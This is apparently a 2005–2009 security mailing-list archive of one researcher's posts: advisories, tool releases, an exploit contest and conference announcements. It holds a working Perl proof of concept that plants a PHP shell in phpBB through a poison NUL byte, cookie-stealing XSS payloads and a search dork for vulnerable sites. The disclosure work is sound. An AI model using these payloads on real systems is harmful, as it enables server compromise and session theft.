 In August 2008 the UK CPNI (United Kingdom's Centre for the Protection of
 National Infrastructure) published the document "Security Assessment of
 the Internet Protocol". The motivation of the aforementioned document is
 explained in the Preface of the document itself. (The paper is available
 at: http://www.cpni.gov.uk/Docs/InternetProtocol.pdf )

 Once the paper was published by CPNI, I produced an IETF Internet-Draft
 version of the same paper, with the intent of having the IETF publish
 recommendations and/or update the specifications where necessary. This
 IETF Internet-Draft is available at:
 http://www.gont.com.ar/drafts/ip-security/index.html (and of course it's
 also available at the IETF I-D repository).

 The Internet-Draft I published was aimed at the OPSEC WG. And the Working
 Group is right now deciding whether to accept this document as a WG item.
 This is certainly a critical step. Having the OPSEC WG accept this
 document as a WG item would guarantee to some extent that the IETF will
 do something about all this, and would also somehow set a precedent in
 updating the specifications of core protocols and/or providing advice on
 security aspects of them.

 The call for consensus is available at:
 http://www.ietf.org/mail-archive/web/opsec/current/msg00373.html . You can
 voice your opinion on the relevant mailing-list sending an e-mail to
 op...@ietf.org . You don't need to subscribe to the mailing list to post a
 message (although your message will be held for moderator approval before
 it is distributed to the list members).

 The deadline for posting your opinion is January 9th (next Friday).

 Thanks so much!

 Kind regards,
 Fernando Gont





-- 
Fernando Gont
e-mail: ferna...@gont.com.ar || fg...@acm.org
PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1









MSFXDC Metasploit eXploits Development Contest

2009-01-05 Thread Jerome Athias
Hi there,

MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge where the main goal is to code the largest number of new
Metasploit Framework exploit modules.
https://www.securinfos.info/metasploit/msfxdc.php

Your mission, if you choose to accept it, is to code new exploit
modules for the Metasploit Framework (latest 3.x version).
Exploit modules must be new with respect to the current Metasploit Framework
SVN repository content.
(http://metasploit.com/svn/framework3/trunk/ Updated to revision 6062)
(Backup:
https://www.securinfos.info/metasploit/framework-trunk-snapshot-6062.tar.gz)

Exploit modules can be fresh new sploits or old exploits ported to the
MSF v3.x.
(ie: stolen from www.milw0rm.com or MSF v2 modules still not ported to
v3
http://metasploit.com/svn/framework3/trunk/documentation/metasploit2/exploits.txt
)

NOTE: Contestants can take advantage of the MSF-eXploit Builder to
achieve this goal ( https://www.securinfos.info/metasploit/MSF_XB.php )

*** MSFXDC STARTS NOW! ***
and you can submit your stuff to:
msf...@ja-psi.com
until February 1st 2009 00H00 GMT

Winner prize:
* Euros 150
* 1 Free VIP Ticket for the FRHACK conference ( http://www.frhack.org )

Points counter:
Working DoS module gives you 1 point
Working web app module gives you 2 points
Working local/remote Exploit gives you 3 points
New fresh exploit (not published before) gives you + 2 points

Classification and all submitted exploits will be publicly provided on:
https://www.securinfos.info/metasploit/msfxdc.php
(including the name/nickname/credits of the coder)

May The MSForce Be With You!
/JA

MSFXDC is organized by JA-PSI, French IT Security Company (
http://www.ja-psi.com ).

Metasploit ™ is a registered trademark. ( http://www.metasploit.com )


FreeRainbowTables.com has changed generation platform

2008-11-27 Thread Jerome Athias
FreeRainbowTables.com has recently moved to the BOINC platform for generation 
of rainbow tables.

We are happy to share the news with our users, and we hope you will continue to 
help us generate more rainbow tables.

It is easy to help us in the generation of high quality rainbow tables. Simply 
visit our download page ( http://www.freerainbowtables.com/en/download/ ) and 
follow the instructions.

Thanks
/JA



[CFP] FRHACK 01 Call For Papers (save the dates!)

2008-11-25 Thread Jerome Athias
, though two
international airports, EuroAirport Basel-Mulhouse-Freiburg and Lyon
Saint-Exupéry International Airport, can be reached in about 2 hours.

[ - Topics - ]

TFT gives preference to lectures with practical demonstration. The
conference staff will try to provide all equipment needed for the
presentation in case the author cannot provide it.

The following topics include, but are not limited to:

 - Rootkits

 - Cryptography

 - Reverse engineering

 - Penetration testing

 - Web application security

 - Exploit development techniques

 - Internet, privacy and Big Brother

 - Telecom security and phone phreaking

 - Fuzzing and application security test

 - Security in Wi-Fi and VoIP environments

 - Information warfare and industrial espionage

 - Denial of service attacks and/or countermeasures

 - Analysis of viruses, worms and all sorts of malware

 - Technical approach to alternative operating systems

 - Techniques for development of secure software & systems

 - Information about smartcard and RFID security and similar

 - Lockpicking, trashing, physical security and urban exploration

 - Hardware hacking, embedded systems and other electronic devices

 - Mobile devices exploitation, Symbian, P2K and bluetooth technologies

 - Security aspects in SCADA, industrial environments and obscure
networks

[ - Important dates - ]

Conference and trainings

   20090909-10: FRHACK trainings

   20090907-08: FRHACK 1st edition

Please register to our RSS to stay tuned:
http://www.frhack.org/frhack.xml

Deadline and submissions

 - Deadline for proposal submissions: 20090601

 - Deadline for slides submissions: 20090701

 - Notification of acceptance or rejection: 20090714

 * E-mail for proposal submissions: [EMAIL PROTECTED] *

Make sure to provide along with your submission the following details:

 - Speaker name and/or nickname, address, e-mail, phone number and
general contact information

 - A brief but informative description about your talk

 - Short biography of the presenter, including organization, company
and affiliations

 - Estimated time-length of presentation and language

 - General topic of the speech (eg.: network security, secure
programming, computer forensics, etc.)

 - Any other technical requirements for your lecture

 - Whether you need visa to enter France or not

Speakers will be allocated 50 minutes of presentation time, although, if
needed, we can extend the presentation length if requested in advance.

Preferable file formats for papers and slides are PDF, and also
ODT/PPT for slides.

Speakers are asked to hand in slides used in their lectures.

PLEASE NOTE: Bear in mind no sales pitches will be allowed. If your
presentation involves advertisement of products or services please do
not submit.
Furthermore, if your talk is just "I found an awesome new technique but if
you want it, just go to hell!" = You're not welcome at FRHACK.

[ - Information for speakers - ]

Please note that it's our first edition, and so we are looking for
sponsors to cover the conference's expenses.

   Speakers' privileges are:

- FRHACK staff can guarantee and we will provide accommodation for 3 nights.

- For each non-resident speaker we hope to be able to cover travel
expenses up to EURO 1500

- For each resident speaker we might be able to cover travel expenses

- Free pass to the conference for you and a friend

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks and pretty girls

[ - Information for instructors - ]

- 50% of the net profit of the class

- 2 nights of accommodation during the trainings

- Free pass to the conference

- Speaker activities during, before, and after the conference

- Speaker After-Party with tons of fun, drinks and much more pretty girls

[ - Information for sponsors - ]

- If you can provide or offer materials, devices, goodies and money,
please contact us at: [EMAIL PROTECTED]

[ - Other information - ]

- For further information please check out our web site
http://www.frhack.org (and nowhere else)
It will be updated with everything regarding the conference.
   
- If you have questions, want to send us additional material, or have
problems, feel free to contact us at: [EMAIL PROTECTED]


Thanks and see you soon at FRHACK!

Jerome Athias, Founder, Chairman, Program Coordinator
/JA


HTTPBruteForcer released

2008-10-25 Thread Jerome Athias
Hi there,

Due to the high number of requests, I have decided to release a fully
usable version of HTTPBruteForcer, the free and easy to use web-based
login forms' bruteforcer for Windows.
HTTP BruteForcer is a tool designed for webmasters, programmers and
website administrators, or pentesters, to perform a password strength
check against a simple web login form.

The old demo version was limited to a limited built-in wordlist.
The new public version lets you use a custom wordlist. (
https://www.securinfos.info/wordlists-dictionnaires.php or default
passwords list
https://www.securinfos.info/passwords-liste-mots-de-passe.html )

Download link and video demonstration:
https://www.securinfos.info/english/httpb/HTTPBruteForcer.exe
MD5: 0b1b50508d8a8fe68798a672515414ac
SHA1: 41eda9a2c47f581b319f80211ea85f880793664b
https://www.securinfos.info/outils-securite-hacking/httpbruteforcer_demo.swf.php

-- IMPORTANT NOTES --

HTTPBruteForcer requires Internet Explorer (IE WebBrowser ActiveX)
* This version has some limitations...
* It doesn't include proxy support
* It doesn't support threads
* It doesn't include the login-name bruteforce functionality
* Sources are not publicly available
...

-- HOW TO PROTECT YOUR WEBSITE AGAINST BRUTE FORCE ATTACKS --

To protect your websites against such attacks, we'll soon release a
detailed tutorial.
Anyway, programmers *must* use:
- Best programming practices (avoiding SQL injection and XSS
vulnerabilities, checking user-supplied inputs, etc.)
- Complexity requirements for both user logins and passwords
- A maximum number of login attempts
- Captchas

-- DISCLAIMER --

Use this software at your own risk.
This software is provided AS IS and without warranty of any kind to
the extent allowed by the applicable law.
This software must only be used against your own website or with the
agreement of the owner of a website.
The author of this software does not warrant and does not assume any
responsibility concerning the use of this software.
The author can not be held responsible in case of illegal use of this
software.
The user is solely responsible for its use. The author would not be
liable for any kind of damages, direct or indirect, resulting from a bad
use of this software.

Have a nice week-end.
Best regards
/JA

HTTPBruteForcer is coded by Jerome Athias, webmaster of
https://www.securinfos.info (One of the most famous French IT security
related websites ;p).
HTTPBruteForcer is provided by JA-PSI, a new French IT Security Company,
France.


[Off-Topic] How I was busted. Story of a poor lonesome hacker

2008-10-20 Thread Jerome Athias
How I was busted. Story of a poor lonesome hacker

Hi there,

First I would like to say that this post is not technical, and so most
of you should save time by not reading it. (I apologize for this.)
Then, sorry for my bad English.

My name is Jerome Athias, some could know me, some not, but that's not
important.
You should know that I don't like to speak about me or my private life.
Anyway, I think that this story could be of interest.

I was employed in a little company, in France (the name of this company
will and must remain secret), as programmer analyst.
Today, I've been laid off from this job.
The main reason for that, among a few others, is that I've installed,
for educational purposes, unauthorized hacking tools (The Metasploit
Framework, Tenable Nessus, Cain & Abel... and Nmap) on my work computer.
Like you, I care about security and privacy...
I am a hacker (an enthusiastic home computer hobbyist - Wikipedia),
definitely not a cracker.
I love liberty, human rights and open minds.

I am not claiming charity or money!
(But I accept friendly mails and lawyers' assistance.)
I just want you to avoid against Big Brother.

Take care of yourself!
Best regards
/JA

PS: Respectful of your religion (We are all human, all different, all
equal.), I would like personally to salute the life of Soeur Emmanuelle.
( http://en.wikipedia.org/wiki/S%C5%93ur_Emmanuelle ) - RIP




e107 My_Gallery Plugin Arbitrary File Download Vulnerability

2008-03-25 Thread Jerome Athias
e107 My_Gallery Plugin Arbitrary File Download Vulnerability

Release Date: 2008-03-25
Critical: Moderately critical
Impact: Exposure of system information, Exposure of sensitive information
Where: From remote
Solution Status: Unpatched
Software: My_Gallery v2.3 (plugin for e107) and prior
Link: http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.208

Description:

A photo gallery for e107, powered by the Highslide JS script, with random
gallery menu and navigation menu.

+ User interface for uploading images
+ Pre-moderation of user downloads
+ Control Panel: can edit the name and description, delete and move
+ New comment system, it is now the most opulent gallery
+ New Front page
+ Added BBcode and a button

Vulnerability:
Jerome Athias has discovered a vulnerability in My_Gallery plugin for
e107, which can be exploited by malicious people to disclose sensitive
information.

The vulnerability is caused due to an input validation error in
dload.php when processing arguments passed to the file parameter. This
can be exploited to download arbitrary files from the affected system.

The vulnerability is confirmed in version 2.3. Other versions may also
be affected.

Solution:
Edit the source code to ensure that input is properly validated.

Dork: inurl:e107_plugins/my_gallery

Provided and/or discovered by:
Jerome Athias, JA-PSI
http://www.ja-psi.fr

Other References:
https://www.securinfos.info


Re: n.runs, Sophos, German laws, and customer safety

2007-08-28 Thread Jerome Athias

Hi,

It is important to notice this.
The mentioned German law comes after the similar French law called lcLEN
(aka Fontaine's law).
In 2003-2004, a petition was made against this law, with around 15,000
signatories...

http://www.iris.sgdg.org/actions/len/petition.html

for nothing...

A new anti-security law was voted yesterday in France, this law called 
LEN (loi pour la confiance dans l'économie numérique):

http://www.securityfocus.com/archive/1/359969

And after that we had Guillermito's story,
Hacker Indicted In France For Publishing Exploits:
http://slashdot.org/article.pl?sid=04/03/31/1543248

http://constitutionalcode.blogspot.com/2005/01/guillermito-reverse-engineering.html

Good luck to our neighbours from Deutschland...
I salute you!
/JA

Steven M. Christey wrote:

The n.runs-SA-2007.027 advisory claims code execution through a UPX
file.  This claim is inconsistent with the vendor's statement that
it's only a theoretical DoS:

  http://www.sophos.com/support/knowledgebase/article/28407.html

  A corrupt UPX file causes the virus engine to crash and Sophos
  Anti-Virus to return 'unrecoverable error. leading to scanning being
  terminated. It should not be a security threat although repeated
  files could cause a denial of service.

It is unfortunate that Germany's legal landscape prevents n.runs from
providing conclusive evidence of their claim.  This directly affects
Sophos customers who want to know whether it's just a DoS or not.
Many in the research community know about n.runs and might believe
their claim, but the typical customer does not know who they are
(which is one reason why I think the Pwnies were a good idea).  So,
many customers would be more likely to believe the vendor.  If the
n.runs claim is true, then many customers might be less protected than
they would if German laws did not have the chilling effect they are
demonstrating.

It should be noted that in 2000, a veritable Who's Who of computer
security - including Bruce Schneier, Gene Spafford, Matt Bishop, Elias
Levy, Alan Paller, and other well-known security professionals -
published a statement of concern about the Council of Europe draft
treaty on Crime in Cyberspace, which I believe was the predecessor to
the legal changes that have been happening in Germany:

  http://homes.cerias.purdue.edu/~spaf/coe/TREATY_LETTER.html

Amongst many other things, this letter said:

  Signatory states passing legislation to implement the treaty may
  endanger the security of their computer systems, because computer
  users in those countries will not be able to adequately protect
  their computer systems... legislation that criminalizes security
  software development, distribution, and use is counter to that goal,
  as it would adversely impact security practitioners, researchers,
  and educators.

If I recall correctly, we were assured by representatives that such an
outcome would not occur.

- Steve



VNSECON07 Materials released

2007-08-09 Thread Jerome Athias

Hi ladies and gentlemen,

I'm happy to announce the availability of my materials for my talk at 
VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam.

You can find the intro and slides + the full-text paper at:
https://www.securinfos.info/VNSECON2007

Covered topics:
* usage, enhancement and exploit modules development for the Metasploit 
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF 
eXploit Builder


The latest version of the presented tool, MSF eXploit Builder, should be 
released in a few days at:

https://www.securinfos.info/metasploit/MSF_XB.php

Best regards
Take care

/JA

-- The UNofficial French Metasploit's website: http://www.metasploit.fr



[SecurInfos] PCSoft WinDEV .wdp Project File Handling Buffer Overflow

2007-06-28 Thread Jerome Athias

[SecurInfos] PCSoft WinDEV .wdp Project File Handling Buffer Overflow

Release Date : 2007-06-28

Critical : Moderately critical. Level 3 of 5.
Impact : System access
Where : From remote

Solution Status : Unpatched

Software :
PCSoft WinDEV
(PCSoft WinDEV Express)
(PCSoft WinDEV Mobile)
(PCSoft WebDEV)

Description :
Jerome Athias has reported a vulnerability in PCSoft WinDEV, which can 
be exploited by malicious people to compromise a user's system.


The vulnerability is caused due to a boundary error within the handling 
of a .wdp project file that contains an overly long string in the 
used DLL fields. This can be exploited to cause a stack-based buffer 
overflow and allows arbitrary code execution when a malicious .wdp 
file is opened.
It is also possible to trigger an infinite loop (DoS), resulting in the 
use of a large amount of CPU and memory resources, using a malformed 
project file.


The vulnerability has been reported in version 11 (latest release: 
01F110053p). Older versions and other products (WinDEV Express, Mobile 
and WebDEV) could also be affected.



Solutions :
Do not open .wdp files from non-trusted sources.

Provided and discovered by :
Jerome Athias
http://www.JA-PSI.fr

Original Advisory :
https://www.securinfos.info/english/security-advisories-alerts/20070628_PCSoft.WinDEV.wdp.Project.File.Handling.Buffer.Overflow.php

PoC codes:
https://www.securinfos.info/english/security-tools-hacking/windev_crash.zip



Re: notepad++[v4.1]: (win32) ruby file processing buffer overflow exploit.

2007-05-23 Thread Jerome Athias

*Posted By:* donho
*Date:* 2007-05-22 00:45
[snip]

3. Fix Ruby source file buffer overflow bug.

[snip]

For further information about this project, see : 
http://sourceforge.net/forum/forum.php?forum_id=698183


[EMAIL PROTECTED] wrote:

Is there a fix?



Re: [fuzzing] NOT a 0day! Re: [Full-disclosure] OWASP Fuzzing page

2006-12-14 Thread Jerome Athias

Gadi Evron wrote:

On Tue, 12 Dec 2006, Joxean Koret wrote:

Wow! That's fun! The so called Word 0 day flaw also affects
OpenOffice.org! At least, 1.1.3. And, oh! Abiword does something cool
with the file:



This is NOT a 0day. It is a disclosed vulnerability in full-disclosure
mode, on a mailing list (fuzzing mailing list).

I am not sure why I got this 10 times now, I thought the days of these
bounces were over. But I am tired of seeing every full-disclosure
vulnerability called a 0day anymore.

A 0day, whatever definition you use, is used in the wild before people are
aware of it.

It makes sense and I totally agree with you.
But the fact is that things change (and not always in the right 
direction :-()... due to society, money, the quest for popularity...
Please also remind us of the sense of the word "hacker", for instance, 
since nowadays it's often used to speak about a bad guy/blackhat/pirate - 
I hope you'll agree that it's not the (our) sense.


/JA


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jerome Athias

3APA3A wrote:

Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.


Hi,

you should be interested in this:
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

+ a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA



Re: Free Rainbow Tables.com

2006-10-30 Thread Jerome Athias

Hi,

some free LM Rainbow Tables are now ready for your wget

http://www.freerainbowtables.com/index-rainbowtables-tables.html

Enjoy!

/JA
https://www.securinfos.info/english


Free Rainbow Tables.com

2006-09-26 Thread Jerome Athias

Hi there,

we're proud to announce the official birth of 
http://www.freerainbowtables.com


this website is dedicated to offering free rainbow tables (based on 
rainbowcrack)
a complete set of MD5 tables, alpha-numeric - lowercase - up to 8 
characters, is available for free download


it's just the first project accomplished by various contributors

The FreeRainbowTables Team has developed a (win32) distributed 
precomputation tool, so if you have some CPUs available, you're invited 
to help us in bigger projects!

Just contact the webmaster.

Mirrors are welcome, and spreading the tables in BitTorrent-like networks 
also.


Have a nice crack
/JA
https://www.securinfos.info/english


Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability

2006-09-12 Thread Jerome Athias

Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf

(French translation : 
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )


Best regards
/JA

3APA3A wrote:

Author: ShAnKaR
Title: multiple PHP application poison NULL byte vulnerability
Applications: phpBB 2.0.21, punBB 1.2.12
Threat Level: Critical
Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html

Poison  NULL  byte vulnerability for perl CGI applications was described
in  [1].  ShAnKaR  noted, that same vulnerability also affects different
PHP  applications.  An  example of vulnerable applications are phpBB and
punBB.

Vulnerability  can  be  used  to  upload  or  replace arbitrary files on
server, e.g. PHP scripts, by adding poison NULL (%00) to filename.

In  case  of  phpBB and punBB vulnerability can be exploited by changing
location  of avatar file and uploading avatar file with PHP code in EXIF
data.

A PoC exploit to change Avatar file location for phpBB:



#!/usr/bin/perl -w

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&amp;sid=([^"]+)/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}


References:
[1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55



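As an added illustration of the two input-validation failures discussed in this thread and in the e107 My_Gallery report above (a poison NUL byte in an upload name, and an unvalidated "file" parameter in a download script), here is a small Python sketch of the checks a defender would put in place. It is not code from ShAnKaR's advisory, from the e107 report, or from phpBB, punBB or e107; the base directory and the sample inputs are constructed.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Constructed example, not the code of any application named in these posts.
# Allow-listed image extensions for an avatar upload (hypothetical policy).
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}


def c_string_view(name: str) -> str:
    """What C-level calls (open, stat) see: only the bytes before the first NUL.

    This is the mechanism behind the poison NUL byte: the scripting layer
    keeps the whole string, the C layer stops at the NUL.
    """
    return name.split("\0", 1)[0]


def suffix_only_check(name: str) -> bool:
    """The weak check the NUL byte defeats: it only inspects the visible suffix."""
    return os.path.splitext(name)[1].lower() in ALLOWED_EXT


def avatar_name_ok(name: str) -> bool:
    """Hardened check: no NUL, no directory separators, allow-listed extension."""
    if "\0" in name or "/" in name or "\\" in name:
        return False
    return suffix_only_check(name)


def confined_path(base_dir: str, user_path: str) -> Optional[str]:
    """Resolve user_path under base_dir; return None if it is malformed or escapes.

    Absolute paths replace base_dir in os.path.join and ".." is collapsed by
    realpath, so a single prefix comparison after resolution catches both.
    """
    if not user_path or "\0" in user_path:
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, user_path))
    if full == base or os.path.commonpath([base, full]) != base:
        return None
    return full


def check_request(base_dir: str, raw_file_param: str) -> Optional[str]:
    """Decode a URL-encoded 'file' parameter (%00 becomes a real NUL), then confine it."""
    return confined_path(base_dir, unquote(raw_file_param))


if __name__ == "__main__":
    # Constructed inputs: the avatar path shape from the advisory, and a few
    # download parameters a dload.php-style script might receive.
    nul_name = unquote("images/avatars/shell.php%00.jpg")
    print("suffix-only check passes:", suffix_only_check(nul_name))
    print("C layer would open      :", c_string_view(nul_name))
    print("hardened check          :", avatar_name_ok(os.path.basename(nul_name)))
    base = "/srv/e107/uploads"  # hypothetical upload directory
    for p in ("photo1.jpg", "../../etc/passwd", "sub/../../../x", "shell.php%00.jpg"):
        print(f"{p!r:24} -> {check_request(base, p)}")
```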


Old vulnerable software collection

2006-07-10 Thread Jerome Athias

Hi,

it's often difficult to find old versions of vulnerable software
it's useful to have these old versions to test an exploit, study a 
vulnerability or do a patch analysis...
it's also useful to test a fuzzer, a scanner... for a course or a 
challenge...


so I am thinking about building a little repository of old versions of 
small software (free or trial)


if interested or could help, please visit this page:
https://www.securinfos.info/old_softwares_vulnerable.php

Cheers
/JA


Re: ArGoSoft FTP server remote heap overflow

2006-03-01 Thread Jerome Athias
Hi,

as I replied privately to you, yes I think we can say that. You could
consider it as an update...
Note that the vendor was contacted without response.

Regards
/JA

Steven M. Christey wrote:
 A buffer overflow in DELE was originally reported to Bugtraq by CorryL
 in March 2005, for ArGoSoft FTP 1.4.2.8 (CVE-2005-0696):

   http://www.securityfocus.com/archive/1/392653

 According to CorryL's disclosure timeline, no patch had been released
 by the disclosure date.

 So, is this a rediscovery of that older issue, for the most recent
 version?

 - Steve



ArGoSoft FTP server remote heap overflow

2006-02-25 Thread Jerome Athias
-- Title:
ArGoSoft FTP server remote heap overflow

-- Affected Products:
ArGoSoft FTP server 1.4.3.5 (current) and prior

-- Affected Vendor:
ArGoSoft - http://www.argosoft.com

-- Impact:
DoS, Arbitrary Code Execution

-- Where:
From remote

-- Type:
Heap Overflow

-- Vulnerability Details:
A remote attacker with valid credentials is able to trigger a heap
overwrite in ArgoSoft FTP server.
The bug occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code or
launch a denial of service attack.

-- Credit:
SecurInfos
https://www.securinfos.info/english/



Invision Power Board 2.1 : Multiple XSS Vulnerabilities

2005-11-07 Thread Jerome Athias
Fast translation of benji's advisory
***

Author : benjilenoob
WebSite : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf

Product : Invision power board
Version : 2.1
Risk : Low. XSS

I- XSS non critical:


1. Input passed to the $address variable isn't properly verified in
the administrative section.
This can be exploited by providing a valid login, and javascript
code in the variable.
The code will be executed in a user's browser session in context of
an affected site.

   PoC:

http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete

   This could be exploited to steal cookie information.

2. Input passed to the ACP Notes textarea field in the administrative
section isn't properly verified.
This can be exploited to insert javascript code in the notes.
The code will be executed in a user's browser session in context of
an affected site.
   
PoC:

   </textarea>'<script>alert(document.cookie)</script>

3. Input passed to the Member's Log In User Name, Member's Display Name,
Email Address contains..., IP Address contains..., AIM name contains...,
ICQ Number contains..., Yahoo! Identity contains..., Signature contains...,
Less than n posts, Registered Between (MM-DD-), Last Post Between (MM-DD-)
and Last Active Between (MM-DD-) member profile parameters in the
administrative section isn't properly verified.
This can be exploited to insert javascript code.

4. Non-permanent XSS:

http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]

5. Non-permanent XSS after administrative login:
   http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]

6. Input passed to the description field of a Component in the
Components section of the administrative section isn't properly verified.
This can be exploited to insert javascript code.

PoC:

   </textarea>'<script>alert()</script>

7. Input passed to the Member Name, Password, Email Address fields
of a new member's profile in the administrative section isn't properly
verified.
This can be exploited to insert javascript code.

8. Input passed to the Group Icon Image field of a new Group in the
administrative section isn't properly verified.
   This can be exploited to insert javascript code.

9. Input passed to the Calendar: Title of a new Calendar in the
administrative section isn't properly verified.
This can be exploited to insert javascript code.

Benji
Team RedKod
http://www.redkod.org/

***

Regards,
/JA

http://www.securinfos.info


